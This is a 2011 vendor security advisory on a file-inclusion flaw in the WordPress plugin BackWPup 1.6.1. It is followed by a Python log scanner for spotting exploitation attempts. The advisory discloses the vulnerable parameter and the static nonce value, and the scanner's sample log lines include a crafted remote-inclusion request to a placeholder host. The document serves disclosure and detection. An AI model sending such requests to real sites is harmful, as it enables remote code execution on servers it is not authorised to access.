Security Advisory – SOS-11-003 – WordPress plugin BackWPup – Remote and local code execution
Release Date: 28-Mar-2011
Last Update: 28-Mar-2011
Vendor Notification Date: 25-Mar-2011
Platform: PHP / WordPress
Affected versions: 1.6.1 (verified) and possibly others
Severity Rating: High
Impact: System Access
Attack Vector: Remote without authentication
Solution Status: Upgrade to version 1.7.1
CVE reference: Not yet assigned
A vulnerability has been discovered in the WordPress plugin BackWPup 1.6.1 which can be exploited to execute local or remote code on the web server.
Input passed to the component wp_xml_export.php via the “wpabs” variable allows the inclusion and execution of local or remote PHP files as long as a “_nonce” value is known. The “_nonce” value relies on a static constant which is not defined in the script, meaning that it defaults to the value “822728c8d9”.
Please refer to the PDF version of this advisory for proof of concept code examples.
Solution: Upgrade to BackWPup 1.7.1.
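For sites that ran an affected version, the following added example (not part of the original advisory or of the plugin) reviews web server access logs for requests to wp_xml_export.php that carry a “wpabs” parameter, and reports whether the static “_nonce” default was supplied and whether “wpabs” names a remote location. It assumes combined-format access logs with the parameters in the query string; the `PLUGIN_DIR` path segment and all sample log lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

STATIC_NONCE = "822728c8d9"          # default "_nonce" value given in the advisory
TARGET_SCRIPT = "wp_xml_export.php"  # component named in the advisory
# Assumption: combined log format, parameters sent in the query string.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)  # value starts with a URL scheme

def classify(line):
    """Return a finding for a request that sets wpabs on the script, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["uri"])
    if not url.path.lower().endswith("/" + TARGET_SCRIPT):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if "wpabs" not in params:
        return None
    wpabs = params["wpabs"][0]
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "static_nonce": STATIC_NONCE in params.get("_nonce", []),
        "kind": "remote" if REMOTE_RE.match(wpabs) else "local",
        "wpabs": wpabs,
    }

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines; addresses, hosts and PLUGIN_DIR are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Mar/2011:10:01:02 +0000] "GET /PLUGIN_DIR/wp_xml_export.php?_nonce=822728c8d9&wpabs=http%3A%2F%2Ffiles.example.invalid%2F HTTP/1.1" 200 512',
    '198.51.100.23 - - [28/Mar/2011:10:02:10 +0000] "GET /PLUGIN_DIR/wp_xml_export.php?_nonce=0123456789&wpabs=/srv/www/site/ HTTP/1.1" 403 199',
    '198.51.100.23 - - [28/Mar/2011:10:02:11 +0000] "GET /index.php?wpabs=1 HTTP/1.1" 200 1000',
    '192.0.2.10 - - [28/Mar/2011:10:03:00 +0000] "GET /PLUGIN_DIR/wp_xml_export.php HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `static_nonce` set to true and a 200 status is the case to examine first; requests sent by other methods than the query string are outside what this sketch sees.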
Discovered by: Phil Taylor from Sense of Security Labs.